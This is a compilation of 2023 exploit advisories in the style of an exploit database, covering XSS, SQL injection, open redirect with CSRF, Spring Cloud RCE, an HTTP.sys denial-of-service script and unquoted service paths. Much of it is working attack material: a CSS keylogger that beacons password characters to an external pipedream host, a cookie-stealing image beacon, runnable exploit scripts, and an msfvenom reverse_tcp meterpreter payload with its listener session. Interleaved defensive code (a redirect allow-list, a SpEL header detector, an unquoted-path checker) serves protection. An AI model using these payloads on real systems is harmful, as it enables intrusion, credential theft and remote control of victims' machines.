# Exploit Title: Car Rental Script 1.8 - Stored Cross-site scripting (XSS)
# Date: 30/07/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/car-rental-php-script.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

Release Notes:

Allows an attacker to inject malicious code into the website, giving the ability to steal sensitive
information, manipulate data, and launch additional attacks.

## Stored XSS
-----------------------------------------------
POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1

payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1
-----------------------------------------------

POST parameter 'first_name' is vulnerable to XSS
POST parameter 'second_name' is vulnerable to XSS
POST parameter 'phone' is vulnerable to XSS
POST parameter 'address_1' is vulnerable to XSS
POST parameter 'country' is vulnerable to XSS


## Steps to Reproduce:

1. As a [Guest User], select any [Pickup/Return Location], choose any [Time] & [Rental Age], then click [Search for rent a car] and select any car
2. Inject your [XSS Payload] in "First Name"
3. Inject your [XSS Payload] in "Last Name"
4. Inject your [XSS Payload] in "Phone"
5. Inject your [XSS Payload] in "Address Line 1"
6. Inject your [XSS Payload] in "Country"
7. Accept the terms & press [Booking]
   The XSS fires in the local user's browser.
8. When the ADMIN visits [Dashboard] in the Administration Panel at this path (https://website/index.php?controller=GzAdmin&action=dashboard),
   the XSS fires and executes in their browser
9. When the ADMIN visits [Bookings] - [All Booking] to check [Pending Booking] at this path (https://website/index.php?controller=GzBooking&action=index),
   the XSS fires and executes in their browser
            
Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF
Version: 1.6.1
Bugs:  Open Redirect + CSRF = CSS KEYLOGGING
Technology: PHP
Vendor URL: https://wbce-cms.org/
Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
Date found: 03-07-2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================

1. Log in to the account
2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw)
3. Then upload an HTML file (the HTML file content is as below)

'''
<html>
    <head>
        <title>
            Login
        </title>
        <style>
            input[type="password"][value*="q"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/q');}
            input[type="password"][value*="w"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/w');}
            input[type="password"][value*="e"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/e');}
            input[type="password"][value*="r"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/r');}
            input[type="password"][value*="t"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/t');}
            input[type="password"][value*="y"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/y');}
            input[type="password"][value*="u"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/u');}
            input[type="password"][value*="i"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/i');}
            input[type="password"][value*="o"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/o');}
            input[type="password"][value*="p"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/p');}
            input[type="password"][value*="a"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/a');}
            input[type="password"][value*="s"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/s');}
            input[type="password"][value*="d"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/d');}
            input[type="password"][value*="f"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/f');}
            input[type="password"][value*="g"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/g');}
            input[type="password"][value*="h"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/h');}
            input[type="password"][value*="j"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/j');}
            input[type="password"][value*="k"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/k');}
            input[type="password"][value*="l"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/l');}
            input[type="password"][value*="z"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/z');}
            input[type="password"][value*="x"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/x');}
            input[type="password"][value*="c"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/c');}
            input[type="password"][value*="v"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/v');}
            input[type="password"][value*="b"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/b');}
            input[type="password"][value*="n"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/n');}
            input[type="password"][value*="m"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/m');}
            input[type="password"][value*="Q"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Q');}
            input[type="password"][value*="W"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/W');}
            input[type="password"][value*="E"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/E');}
            input[type="password"][value*="R"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/R');}
            input[type="password"][value*="T"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/T');}
            input[type="password"][value*="Y"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Y');}
            input[type="password"][value*="U"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/U');}
            input[type="password"][value*="I"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/I');}
            input[type="password"][value*="O"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/O');}
            input[type="password"][value*="P"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/P');}
            input[type="password"][value*="A"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/A');}
            input[type="password"][value*="S"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/S');}
            input[type="password"][value*="D"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/D');}
            input[type="password"][value*="F"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/F');}
            input[type="password"][value*="G"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/G');}
            input[type="password"][value*="H"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/H');}
            input[type="password"][value*="J"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/J');}
            input[type="password"][value*="K"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/K');}
            input[type="password"][value*="L"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/L');}
            input[type="password"][value*="Z"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/Z');}
            input[type="password"][value*="X"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/X');}
            input[type="password"][value*="C"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/C');}
            input[type="password"][value*="V"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/V');}
            input[type="password"][value*="B"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/B');}
            input[type="password"][value*="N"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/N');}
            input[type="password"][value*="M"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/M');}
            input[type="password"][value*="1"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/1');}
            input[type="password"][value*="2"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/2');}
            input[type="password"][value*="3"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/3');}
            input[type="password"][value*="4"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/4');}
            input[type="password"][value*="5"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/5');}
            input[type="password"][value*="6"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/6');}
            input[type="password"][value*="7"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/7');}
            input[type="password"][value*="8"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/8');}
            input[type="password"][value*="9"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/9');}
            input[type="password"][value*="0"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/0');}
            input[type="password"][value*="-"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/-');}
            input[type="password"][value*="."]{
            background-image: url('https://enflownwx6she.x.pipedream.net/.');}
            input[type="password"][value*="_"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%60');}
            input[type="password"][value*="@"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%40');}
            input[type="password"][value*="?"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}
            input[type="password"][value*=">"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}
            input[type="password"][value*="<"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}
            input[type="password"][value*="="]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}
            input[type="password"][value*=":"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}
            input[type="password"][value*=";"]{
            background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}
        </style>
    </head>
<body>
    <label>Please enter username and password</label>
    <br><br>
    Password:: <input type="password" />
    <script>
        document.querySelector('input').addEventListener('keyup', (evt)=>{
        evt.target.setAttribute('value', evt.target.value);
        })
   </script>
</body>
</html>
'''

4. Then go to the URL of the HTML file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy the URL.
5. Then log out of the account and go to the login page again (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php)


POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1
Host: localhost
Content-Length: 160
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg
Connection: close

url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login
 
6. If you set the url parameter of the above request to (https://ATTACKER.com), you are redirected to attacker.com.
7. We write the URL of the HTML file into it:

url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html

8. And create a CSRF PoC with a CSRF PoC generator:

```html
<html>
  <title>
    This CSRF was found by miri
  </title>
  <body>
    <h1>
      CSRF POC
    </h1>
    <form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded">
      <input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>
```


9. If the victim clicks, they are redirected to the HTML file, and this page sends all of the victim's keyboard activity to my server.


Poc video : https://youtu.be/m-x_rYXTP9E
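The chain above only works because the login handler redirects to whatever the `url` parameter carries. The following is an added example, not WBCE code: a hypothetical allow-list check for that parameter that accepts only an absolute path under the application's own admin area (the base path is taken from the advisory's URLs; the fallback landing page is an assumed placeholder) and sends everything else to the fallback.

```python
"""Allow-list check for a post-login redirect target.

Added example, not WBCE code. Only a plain absolute path under the
application's admin area is accepted; any scheme, host, protocol-relative
URL, control character or dot segment results in the fallback page instead.
"""
from urllib.parse import urlsplit, urlunsplit

# Assumed installation layout, taken from the paths in the advisory above.
APP_BASE_PATH = "/WBCE_CMS-1.6.1/wbce/admin/"
# Assumed safe landing page (placeholder; use the real dashboard path).
FALLBACK_TARGET = APP_BASE_PATH


def safe_redirect_target(raw_url, base_path=APP_BASE_PATH, fallback=FALLBACK_TARGET):
    """Return a redirect target that cannot leave the site.

    The result is safe to place in a Location header as-is: anything that is
    not an absolute path under `base_path` is replaced by `fallback`.
    """
    if not raw_url:
        return fallback
    candidate = raw_url.strip()
    # Control characters and whitespace are rejected outright: CR/LF would let
    # the value split the Location header, and browsers silently strip tabs
    # and newlines while parsing, which would defeat later checks.
    if any(ord(ch) < 0x21 or ord(ch) == 0x7F for ch in candidate):
        return fallback
    # Browsers treat a backslash like a forward slash, so "/\evil.example"
    # is really "//evil.example", a protocol-relative URL to another host.
    candidate = candidate.replace("\\", "/")
    parts = urlsplit(candidate)
    # Any scheme (http:, https:, javascript:, data:) or network location
    # (including a protocol-relative "//host") means the target is not ours.
    if parts.scheme or parts.netloc:
        return fallback
    path = parts.path
    # Only absolute paths inside the admin area; no dot segments, so a value
    # like base_path + "../../media/x.html" cannot escape it.
    if not path.startswith(base_path):
        return fallback
    if any(segment in ("..", ".") for segment in path.split("/")):
        return fallback
    # Rebuild without scheme, host or fragment; the query string is kept.
    return urlunsplit(("", "", path, parts.query, ""))


if __name__ == "__main__":
    # Constructed inputs, including the two values used in the advisory above.
    for value in [
        "https://ATTACKER.com",
        "http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html",
        "//evil.example/",
        "/\\evil.example/",
        "javascript:alert(1)",
        APP_BASE_PATH + "../../media/css-keyloger.html",
        APP_BASE_PATH + "media/index.php?x=1",
    ]:
        print(f"{value!r:70} -> {safe_redirect_target(value)}")
```

Note that the check deliberately refuses absolute URLs even when their host is the site's own, so a same-host link to the uploaded media file is rejected as well as the attacker's domain.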
            
#Exploit Title: Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)
#Date: 25 June 2023
#Exploit Author: Okan Kurtulus
#Vendor Homepage: https://piwigo.org
#Version: 13.7.0
#Tested on: Ubuntu 22.04
#CVE : N/A

# Proof of Concept:
1. Install the system through the website and log in with any user authorized to upload photos.
2. Click "Add" under "Photos" in the left menu. Select and upload the photo you want.
3. Click on the uploaded photo and the photo editing screen opens. Enter the XSS payload in the "Description" section on this screen. After saving, go to the homepage and open the page with the photo. The XSS payload is triggered.

#Payload
<sCriPt>alert(1);</sCriPt>
            
## Title: Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure
## Author: nu11secur1ty
## Date: 07.06.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/edge?form=MA13FJ&exp=e415
## Reference: https://portswigger.net/web-security/information-disclosure, https://www.softwaresecured.com/stride-threat-modeling/
## CVE-2023-33145



## Description:
The type of information that could be disclosed if an attacker
successfully exploited this vulnerability is data inside the targeted
website, such as IDs, tokens, nonces, cookies, IP, User-Agent, and other
sensitive information.
The user would have to click on a specially crafted URL to be
compromised by the attacker.
In this example, the attacker uses STRIDE threat modeling to spoof the
victim into clicking on his website, and that is all it takes.
This will be hard to detect.

## Conclusion:
Please be careful with suspicious sites, and be careful about who sends you
a link to open!

## Status: HIGH Vulnerability

[+]Exploit:

- Exploit Server:

This is a GET request to the server when the victim clicks, and it is enough to understand this vulnerability! =)

```html
<script> var i = new Image();
i.src="PoCsess.php?cookie="+escape(document.cookie)</script>
```

WARNING: The PoCsess.php will not be uploaded, for security reasons!
BR nu11secur1ty

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33146)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-edge.html)

## Time spent:
01:30:00
            
# Exploit Title: Lost and Found Information System v1.0 - SQL Injection
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /php-lfis/admin/?page=system_info/contact_information
# Tested on: Windows/Linux
# CVE : CVE-2023-33592

```python
import requests

# URL of the vulnerable component
url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"

# Injecting a SQL query to exploit the vulnerability
payload = "' OR 1=1 -- "

# Send the request with the injected payload
response = requests.get(url + payload)

# Check if the SQL injection was successful
if "admin" in response.text:
    print("SQL injection successful!")
else:
    print("SQL injection failed.")
```
# Exploit Title: Faculty Evaluation System v1.0 - SQL Injection
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip
# Version: 1.0
# Tested on: Windows Server 2022

SQLi #1

File: edit_evaluation
Line #4

```php
$qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array();
[...]
```

SQLi #2

File: view_faculty.php
Line #4

```php
// Add "id" parameter after "view_faculty" parameter then add equals "id" with integer
[...]
$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();
[...]
```

Steps to Exploit:

1. Login to application
2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1"
3. Copy request to intercept proxy to file
4. Exploit using SQLMap

sqlmap -r test.txt --threads 1 --dbms=mysql --fingerprint

[...]
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
[INFO] actively fingerprinting MySQL
[INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.6.49
               fork fingerprint: MariaDB
[...]
## Title: Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution
## Author: nu11secur1ty
## Date: 01.14.2022
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/download/details.aspx?id=48264
## Reference: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907
## CVE-2022-21907

## Description:
NOTE: After a couple of hours of tests and experiments, I found that there have been no vulnerabilities; this is just a ridiculous experiment of Microsoft. When I decided to install the IIS packages on these Windows platforms, everything was OK, and everything is patched! Windows Server 2019 and Windows 10 version 1809 (2018) are not vulnerable by default, but after I decided to upgrade from 1909 to 2004, I found a serious problem! Windows 10 version 2004 (2020) is still vulnerable in the HTTP Protocol Stack (HTTP.sys). Attack method: buffer overflow - denial of service and restart of the system. This problem has existed since last year, when it was reported as CVE-2021-31166, and it is still there! In those days I worked on it again with the help and collaboration of Axel Souchet (0vercl0k), the author of the idea. On that day, I wrote only a one-line command to exploit this vulnerability!

[+]Exploit:

```python
#!/usr/bin/python
# Author @nu11secur1ty
# CVE-2022-21907

from colorama import init, Fore, Back, Style
init(convert=True)
import requests
import time

print(Fore.RED + "Please input your host...\n")
print(Style.RESET_ALL)
print(Fore.YELLOW)
host = input()
print(Style.RESET_ALL)

print(Fore.BLUE + "Sending of especially malicious crafted packages, please wait...")
print(Style.RESET_ALL)
time.sleep(17)
print(Fore.GREEN)

# The PoC :)
poc = requests.get(f'http://{host}/', headers={'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA,\
BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\
RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\
TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\
OOOAOAOOOAOOAOOOAOOOAOOOAOO,\
****************************stupiD, *, ,',})

# Not necessary :)
print(poc, "\n")
print(Style.RESET_ALL)
```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows10Exploits/tree/master/2022/CVE-2022-21907)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2022/01/cve-2022-21907.html)

## Time spent:
05:30:00
# Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE)
# Date: 07/07/2023
# Exploit Author: GatoGamer1155, 0bfxgh0st
# Vendor Homepage: https://spring.io/projects/spring-cloud-function/
# Description: Exploit to execute commands exploiting CVE-2022-22963
# Software Link: https://spring.io/projects/spring-cloud-function
# CVE: CVE-2022-22963

```python
import requests, argparse, json

parser = argparse.ArgumentParser()
parser.add_argument("--url", type=str, help="http://172.17.0.2:8080/functionRouter", required=True)
parser.add_argument("--command", type=str, help="ping -c1 172.17.0.1", required=True)
args = parser.parse_args()

print("\n\033[0;37m[\033[0;33m!\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\n")

headers = {"spring.cloud.function.routing-expression": 'T(java.lang.Runtime).getRuntime().exec("%s")' % args.command}
data = {"data": ""}

request = requests.post(args.url, data=data, headers=headers)
response = json.dumps(json.loads(request.text), indent=2)

print(response)
```
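The PoC above rides entirely on one request header, `spring.cloud.function.routing-expression`, which the application evaluates as SpEL. The following is an added detection example, not part of the PoC: a classifier a reverse proxy or log pipeline could apply to request headers, run over a constructed JSON-per-line access log (the `src`, `path` and `headers` keys are assumptions of this example).

```python
"""Flag requests carrying code-execution SpEL in the Spring Cloud Function
routing header (the CVE-2022-22963 vector shown above).

Added example; not part of the PoC. The log format (one JSON object per
line with "src", "path" and a "headers" map) is constructed for the example.
"""
import json
import re

ROUTING_HEADER = "spring.cloud.function.routing-expression"

# SpEL constructs a routing expression never needs but code execution does:
# type references T(...), Runtime/ProcessBuilder access, reflection.
CODE_EXEC = re.compile(
    r"\bT\s*\(|getRuntime\s*\(|\.exec\s*\(|ProcessBuilder|new\s+java\.|getClass\s*\("
)


def classify_headers(headers):
    """Return 'allow', 'review' (routing header present) or 'block'
    (routing header carries a code-execution construct)."""
    for name, value in headers.items():
        if name.lower() != ROUTING_HEADER:   # header names are case-insensitive
            continue
        return "block" if CODE_EXEC.search(value) else "review"
    return "allow"


def scan_log(lines):
    """Classify each JSON log record; return (src, path, verdict) for every
    record that is not plainly allowed."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        record = json.loads(line)
        verdict = classify_headers(record.get("headers", {}))
        if verdict != "allow":
            findings.append((record["src"], record["path"], verdict))
    return findings


# Constructed sample log. The third record mirrors the PoC's header, using
# the "ping -c1 172.17.0.1" validation command from its --help text; the
# second carries an ordinary header-based routing expression.
SAMPLE_LOG = """
{"src": "10.0.0.5", "path": "/functionRouter", "headers": {"Content-Type": "application/json"}}
{"src": "10.0.0.6", "path": "/functionRouter", "headers": {"spring.cloud.function.routing-expression": "headers['x-target']"}}
{"src": "10.0.0.7", "path": "/functionRouter", "headers": {"Spring.Cloud.Function.Routing-Expression": "T(java.lang.Runtime).getRuntime().exec(\\"ping -c1 172.17.0.1\\")"}}
"""


if __name__ == "__main__":
    for src, path, verdict in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{verdict:6} {src:10} {path}")
```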
# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: https://www.minitool.com/
# Software Link: https://www.minitool.com/download-center/
# Version: 12.7
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36165

#PoC

C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
MTSchedulerService    MTSchedulerService    C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe    Auto

C:\Users>sc qc MTSchedulerService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MTSchedulerService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : MTSchedulerService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users>systeminfo
Host Name:                 DESKTOP-LA7J17P
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19042 N/A Build 19042
OS Manufacturer:           Microsoft Corporation
# Exploit Title: BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: None
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36163

#PoC:
An attacker just needs to find the vulnerable parameter (mc=) and inject JS code like:

'><script>prompt("XSS");</script><div id="aa

After that, the attacker needs to send the full URL with the JS code to the victim, and it executes in their browser.

#Payload:
company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa
# Exploit Title: XAMPP 8.2.4 - Unquoted Path
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 8.2.4
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe
# Tested on: Windows Server 2022
# Blog: http://msecureltd.blogspot.com/

Steps to Exploit:

1. Search for unquoted paths
2. Generate meterpreter shell
3. Copy shell to XAMPP directory replacing "mysql.exe"
4. Exploit by double clicking on shell

C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
mysql    mysql    C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql    Auto

// Generate shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe

// Setup listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 192.168.1.13
msf6 exploit(multi/handler) > set lport 4443
msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.13:4443
[*] Sending stage (175686 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700

meterpreter > getuid
Server username: WIN-5PT4K404NLO\astoykov
meterpreter > getpid
Current pid: 4724
meterpreter > shell
Process 5884 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.1]
(c) Microsoft Corporation. All rights reserved.
[...]
C:\xampp\mysql\bin>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 80B5-B405

 Directory of C:\xampp\mysql\bin
[...]
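Both the MiniTool ShadowMaker and the XAMPP write-ups above find their candidates with the same `wmic service get ... | findstr` pipeline and `sc qc`. The following is an added example, not part of either advisory: a small offline check that parses `sc qc` output (a constructed copy of the MiniTool output shown above) and lists the intermediate executables the Service Control Manager would probe for an unquoted BINARY_PATH_NAME. It examines the path only; whether a directory is writable by unprivileged users (what the XAMPP write-up relies on to replace the binary) is a separate check.

```python
"""List the executables Windows would try before an unquoted service binary.

Added example, not part of the advisories. For an unquoted command line,
CreateProcess cannot tell where the executable name ends, so it tries each
prefix up to a space in turn, appending .exe when the prefix has no
extension; each such prefix is a path worth auditing.
"""
import re

# Constructed copy of the `sc qc MTSchedulerService` output shown above.
SC_QC_SAMPLE = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MTSchedulerService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : MTSchedulerService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text):
    """Turn `sc qc` output into a dict keyed by the upper-case field name."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")   # first colon only; drive letters come later
        if sep and key.strip().isupper():        # skips the "[SC] ..." banner
            fields[key.strip()] = value.strip()
    return fields


def probe_paths(binary_path_name):
    """Return the paths tried before the intended executable, in order.

    A quoted path or a space-free executable yields an empty list. Arguments
    after the first ".exe" token are ignored: spaces there are harmless.
    """
    cmd = binary_path_name.strip()
    if cmd.startswith('"'):
        return []
    match = re.search(r"\.exe(?=\s|$)", cmd, re.IGNORECASE)
    exe = cmd[:match.end()] if match else cmd
    probes = []
    for index, char in enumerate(exe):
        if char == " ":
            prefix = exe[:index]
            last_segment = prefix.rsplit("\\", 1)[-1]
            probes.append(prefix if "." in last_segment else prefix + ".exe")
    return probes


def assess_sc_qc(text):
    """Summarise one `sc qc` block: name, auto-start flag, probe list, finding."""
    fields = parse_sc_qc(text)
    binary = fields.get("BINARY_PATH_NAME", "")
    probes = probe_paths(binary)
    return {
        "service": fields.get("SERVICE_NAME", ""),
        "auto_start": "AUTO_START" in fields.get("START_TYPE", ""),
        "binary": binary,
        "probes": probes,
        "finding": bool(probes),
    }


if __name__ == "__main__":
    result = assess_sc_qc(SC_QC_SAMPLE)
    print(result["service"], "auto-start:", result["auto_start"])
    for path in result["probes"]:
        print("  tried before the real binary:", path)
    # The XAMPP path from the second advisory: unquoted, but the executable
    # itself contains no spaces, so nothing is probed ahead of it.
    print(probe_paths(r"C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini"))
```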
# Exploit Title: News Portal v4.0 - SQL Injection (Unauthorized)
# Date: 09/07/2023
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c
# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643
